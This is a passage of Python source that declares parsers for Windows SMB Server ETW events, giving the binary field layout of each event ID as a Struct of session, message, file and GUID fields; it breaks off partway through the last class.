@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=9, version=2)
class Microsoft_Windows_SMBServer_9_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"CloseFlags" / Int16ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=10, version=2)
class Microsoft_Windows_SMBServer_10_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=11, version=2)
class Microsoft_Windows_SMBServer_11_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"Length" / Int32ul,
"Offset" / Int64ul,
"FileId" / Int64ul,
"MinimumCount" / Int32ul,
"Channel" / Int32ul,
"RemainingBytes" / Int32ul,
"ReadChannelInfoOffset" / Int16ul,
"ReadChannelInfoLength" / Int16ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=12, version=2)
class Microsoft_Windows_SMBServer_12_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"Length" / Int32ul,
"Offset" / Int64ul,
"FileId" / Int64ul,
"Channel" / Int32ul,
"RemainingBytes" / Int32ul,
"WriteChannelInfoOffset" / Int16ul,
"WriteChannelInfoLength" / Int16ul,
"WriteFlags" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=13, version=2)
class Microsoft_Windows_SMBServer_13_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"OplockLevel" / Int8ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=14, version=2)
class Microsoft_Windows_SMBServer_14_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"LeaseFlags" / Int32ul,
"CurrentLeaseState" / Int32ul,
"NewLeaseState" / Int32ul,
"BreakReason" / Int32ul,
"AccessMaskHint" / Int32ul,
"ShareMaskHint" / Int32ul,
"LeaseKey" / Guid,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=15, version=2)
class Microsoft_Windows_SMBServer_15_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"LeaseFlags" / Int32ul,
"LeaseState" / Int32ul,
"LeaseDuration" / Int64sl,
"LeaseKey" / Guid,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=16, version=2)
class Microsoft_Windows_SMBServer_16_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid,
"LockCount" / Int16ul,
"Locks" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=17, version=2)
class Microsoft_Windows_SMBServer_17_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"FileId" / Int64ul,
"ControlCode" / Int32ul,
"IoctlFlags" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=18, version=2)
class Microsoft_Windows_SMBServer_18_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"FileInformationClass" / Int8ul,
"QueryDirectoryFlags" / Int8ul,
"FileIndex" / Int32ul,
"FileId" / Int64ul,
"OutputBufferLength" / Int32ul,
"NameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.NameLength),
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=19, version=2)
class Microsoft_Windows_SMBServer_19_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"ChangeNotifyFlags" / Int16ul,
"FileId" / Int64ul,
"OutputBufferLength" / Int32ul,
"CompletionFilter" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=20, version=2)
class Microsoft_Windows_SMBServer_20_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"InfoType" / Int8ul,
"InfoClass" / Int8ul,
"OutputBufferLength" / Int32ul,
"SecurityInformation" / Int32ul,
"QueryInfoFlags" / Int32ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=21, version=2)
class Microsoft_Windows_SMBServer_21_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsRequested" / Int16ul,
"Flags" / Int32ul,
"InfoType" / Int8ul,
"InfoClass" / Int8ul,
"SecurityInformation" / Int32ul,
"FileId" / Int64ul,
"OutputBufferLength" / Int32ul,
"OutputBuffer" / Bytes(lambda this: this.OutputBufferLength),
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=101, version=2)
class Microsoft_Windows_SMBServer_101_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"SecurityMode" / Int16ul,
"DialectRevision" / Int16ul,
"Capabilities" / Int32ul,
"MaxTransactSize" / Int32ul,
"MaxReadSize" / Int32ul,
"MaxWriteSize" / Int32ul,
"SystemTime" / Int64ul,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=102, version=2)
class Microsoft_Windows_SMBServer_102_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"SessionFlags" / Int16ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=103, version=2)
class Microsoft_Windows_SMBServer_103_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=104, version=2)
class Microsoft_Windows_SMBServer_104_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ShareType" / Int8ul,
"ShareFlags" / Int32ul,
"Capabilities" / Int32ul,
"MaximalAccess" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=105, version=2)
class Microsoft_Windows_SMBServer_105_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=106, version=2)
class Microsoft_Windows_SMBServer_106_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=108, version=2)
class Microsoft_Windows_SMBServer_108_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"OplockLevel" / Int8ul,
"CreateAction" / Int32ul,
"CreationTime" / Int64ul,
"LastAccessTime" / Int64ul,
"LastWriteTime" / Int64ul,
"LastChangeTime" / Int64ul,
"AllocationSize" / Int64ul,
"EndOfFile" / Int64ul,
"FileAttributes" / Int32ul,
"FileId" / Int64ul,
"CreateContextsCount" / Int32ul,
"LeaseKey" / Guid,
"LeaseLevel" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=109, version=2)
class Microsoft_Windows_SMBServer_109_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"CloseFlags" / Int16ul,
"CreationTime" / Int64ul,
"LastAccessTime" / Int64ul,
"LastWriteTime" / Int64ul,
"ChangeTime" / Int64ul,
"AllocationSize" / Int64ul,
"EndOfFile" / Int64ul,
"FileAttributes" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=110, version=2)
class Microsoft_Windows_SMBServer_110_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=111, version=2)
class Microsoft_Windows_SMBServer_111_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"LengthRead" / Int32ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=112, version=2)
class Microsoft_Windows_SMBServer_112_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"LengthWritten" / Int32ul,
"Remaining" / Int32ul,
"WriteChannelInfoOffset" / Int16ul,
"WriteChannelInfoLength" / Int16ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=113, version=2)
class Microsoft_Windows_SMBServer_113_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"OplockLevel" / Int8ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=115, version=2)
class Microsoft_Windows_SMBServer_115_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"LeaseFlags" / Int32ul,
"LeaseState" / Int32ul,
"LeaseDuration" / Int64sl,
"LeaseKey" / Guid,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=116, version=2)
class Microsoft_Windows_SMBServer_116_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=117, version=2)
class Microsoft_Windows_SMBServer_117_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ControlCode" / Int32ul,
"IoctlFlags" / Int32ul,
"FileId" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=118, version=2)
class Microsoft_Windows_SMBServer_118_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=119, version=2)
class Microsoft_Windows_SMBServer_119_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=120, version=2)
class Microsoft_Windows_SMBServer_120_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"OutputBufferLength" / Int32ul,
"OutputBuffer" / Bytes(lambda this: this.OutputBufferLength),
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
"TreeConnectGUID" / Guid,
"FileGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=121, version=2)
class Microsoft_Windows_SMBServer_121_2(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"ProcessId" / Int32ul,
"TreeId" / Int32ul,
"MessageId" / Int64ul,
"MasterMessageId" / Int64ul,
"Command" / Int16ul,
"CreditsGranted" / Int16ul,
"Flags" / Int32ul,
"Status" / Int32ul,
"ProcessingHits" / Int32ul,
"ProcessingCycles" / Int64ul,
"QueueHits" / Int32ul,
"QueueCycles" / Int64ul,
"FileSystemFastHits" / Int32ul,
"FileSystemFastCycles" / Int64ul,
"FileSystemSlowHits" / Int32ul,
"FileSystemSlowCycles" / Int64ul,
"TransportFastHits" / Int32ul,
"TransportFastCycles" / Int64ul,
"TransportSlowHits" / Int32ul,
"TransportSlowCycles" / Int64ul,
"SecurityHits" / Int32ul,
"SecurityCycles" / Int64ul,
"ConnectionGUID" / Guid,
"SessionGUID" / Guid,
